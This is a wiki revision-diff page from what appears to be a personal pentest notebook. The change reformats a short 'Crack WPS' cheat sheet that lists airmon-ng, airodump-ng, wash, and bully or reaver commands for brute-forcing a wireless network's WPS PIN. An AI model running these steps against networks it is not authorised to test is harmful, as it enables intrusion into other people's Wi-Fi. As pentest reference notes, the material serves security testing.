User Tools

Site Tools


pentest:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revisionBoth sides next revision
pentest:start [2014/10/31 06:32] michaelurspringerpentest:start [2014/10/31 06:33] michaelurspringer
Line 8: Line 8:
 === Crack WPS === === Crack WPS ===
  
-# Start monitor interface +# Start monitor interface\\ 
-airmon-ng start wlan0+airmon-ng start wlan0\\ 
 +\\ 
 +# Check for WLAN networks nearby\\ 
 +airodump-ng mon0\\ 
 +\\ 
 +# Check for WPS enabled devices\\ 
 +wash -i mon0 --ignore-fcs\\ 
 +\\ 
 +# Bully for bruteforce attack of WPS key\\ 
 +bully -B mon0 -o <outputfile> -b <BSSID>\\ 
 +        Alternative\\ 
 +reaver -i mon0 -vv -b <BSSID>\\
  
-# Check for WLAN networks nearby 
-airodump-ng mon0 
- 
-# Check for WPS enabled devices 
-wash -i mon0 --ignore-fcs 
- 
-# Bully for bruteforce attack of WPS key 
-bully -B mon0 -o <outputfile> -b <BSSID> 
-        Alternative 
-reaver -i mon0 -vv -b <BSSID> 
pentest/start.txt · Last modified: 2014/12/23 16:08 by michaelurspringer